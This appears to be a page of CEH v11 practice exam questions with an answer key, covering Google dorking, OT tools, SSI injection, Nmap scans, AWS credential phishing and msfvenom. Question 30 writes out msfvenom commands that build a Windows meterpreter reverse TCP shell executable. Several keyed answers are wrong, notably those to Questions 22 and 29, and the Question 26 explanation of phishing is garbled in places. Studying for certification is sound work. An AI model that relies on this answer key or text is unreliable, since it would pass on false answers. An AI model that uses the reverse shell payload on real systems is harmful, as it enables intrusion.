EC-COUNCIL CEH v11 312-50V11 Questions & Answers

• Question 21:

  Which results will be returned with the following Google search query? site:target.com site:Marketing.target.com accounting

  A. Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting.

  B. Results matching all words in the query.

  C. Results for matches on target.com and Marketing.target.com that include the word "accounting"

  D. Results matching "accounting" in domain target.com but not on the site Marketing.target.com

  Correct Answer: D

• Question 22:

  An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization deckled to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure?

  A. Robotium

  B. BalenaCloud

  C. Flowmon

  D. IntentFuzzer

  Correct Answer: B

• Question 23:

  Upon establishing his new startup, Tom hired a cloud service provider (CSP) but was dissatisfied with their

  service and wanted to move to another CSP.

  What part of the contract might prevent him from doing so?

  A. Virtualization

  B. Lock-in

  C. Lock-down

  D. Lock-up

  Correct Answer: B

• Question 24:

  Calvin, a software developer, uses a feature that helps him auto-generate the content of a web page without manual involvement and is integrated with SSI directives. This leads to a vulnerability in the developed web application as this feature accepts remote user inputs and uses them on the page. Hackers can exploit this feature and pass malicious SSI directives as input values to perform malicious activities such as modifying and erasing server files. What is the type of injection attack Calvin's web application is susceptible to?

  A. Server-side template injection

  B. Server-side JS injection

  C. CRLF injection

  D. Server-side includes injection

  Correct Answer: D

• Question 25:

  A penetration tester is conducting a port scan on a specific host. The tester found several ports opened that were confusing in concluding the Operating System (OS) version installed. Considering that NMAP result below, which of the following is likely to be installed on the target machine by the OS? Starting NMAP 5.21 at 2011-03-15 11:06 NMAP scan report for 172.16.40.65 Host is up (1.00s latency). Not shown: 993 closed ports PORT STATE SERVICE 21/tcp open ftp 23/tcp open telnet 80/tcp open http 139/ tcp open netbios- ssn 515/tcp open 631/tcp open ipp 9100/tcp open MAC Address: 00:00:48:0D:EE:8

  A. The host is likely a Linux machine.

  B. The host is likely a printer.

  C. The host is likely a router.

  D. The host is likely a Windows machine.

  Correct Answer: B

• Question 26:

  Sam, a professional hacker. targeted an organization with intention of compromising AWS IAM credentials. He attempted to lure one of the employees of the organization by initiating fake calls while posing as a legitimate employee. Moreover, he sent phishing emails to steal the AWS 1AM credentials and further compromise the employee's account. What is the technique used by Sam to compromise the AWS IAM credentials?

  A. Social engineering

  B. insider threat

  C. Password reuse

  D. Reverse engineering

  Correct Answer: A

  Just like any other service that accepts usernames and passwords for logging in, AWS users are vulnerable to social engineering attacks from attackers. fake emails, calls, or any other method of social engineering, may find yourself with an AWS users' credentials within the hands of an attacker. If a user only uses API keys for accessing AWS, general phishing techniques could still use to gain access to other accounts or their pc itself, where the attacker may then pull the API keys for aforementioned AWS user. With basic opensource intelligence (OSINT), it's usually simple to collect a list of workers of an organization that use AWS on a regular basis. This list will then be targeted with spear phishing to do and gather credentials. an easy technique may include an email that says your bill has spiked 500th within the past 24 hours, "click here for additional information", and when they click the link, they're forwarded to a malicious copy of the AWS login page designed to steal their credentials. An example of such an email will be seen within the screenshot below. it's exactly like an email that AWS would send to you if you were to exceed the free tier limits, except for a few little changes. If you clicked on any of the highlighted regions within the screenshot, you'd not be taken to the official AWS web site and you'd instead be forwarded to a pretend login page setup to steal your credentials. These emails will get even more specific by playing a touch bit additional OSINT before causing them out. If an attacker was ready to discover your AWS account ID on-line somewhere, they could use methods we at rhino have free previously to enumerate what users and roles exist in your account with none logs contact on your side. they could use this list to more refine their target list, further as their emails to reference services they will know that you often use. For reference, the journal post for using AWS account IDs for role enumeration will be found here and the journal post for using AWS account IDs for user enumeration will be found here. During engagements at rhino, we find that phishing is one in all the fastest ways for us to achieve access to an AWS environment.

• Question 27:

  During a black-box pen test you attempt to pass IRC traffic over port 80/TCP from a compromised web enabled host. The traffic gets blocked; however, outbound HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?

  A. Circuit

  B. Stateful

  C. Application

  D. Packet Filtering

  Correct Answer: B

• Question 28:

  What would you enter if you wanted to perform a stealth scan using Nmap?

  A. nmap -sM

  B. nmap -sU

  C. nmap -sS

  D. nmap -sT

  Correct Answer: C

• Question 29:

  John is an incident handler at a financial institution. His steps in a recent incident are not up to the standards of the company. John frequently forgets some steps and procedures while handling responses as they are very stressful to perform. Which of the following actions should John take to overcome this problem with the least administrative effort?

  A. Create an incident checklist.

  B. Select someone else to check the procedures.

  C. Increase his technical skills.

  D. Read the incident manual every time it occurs.

  Correct Answer: C

• Question 30:

  what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

  A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

  B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c

  C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

  D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

  Correct Answer: C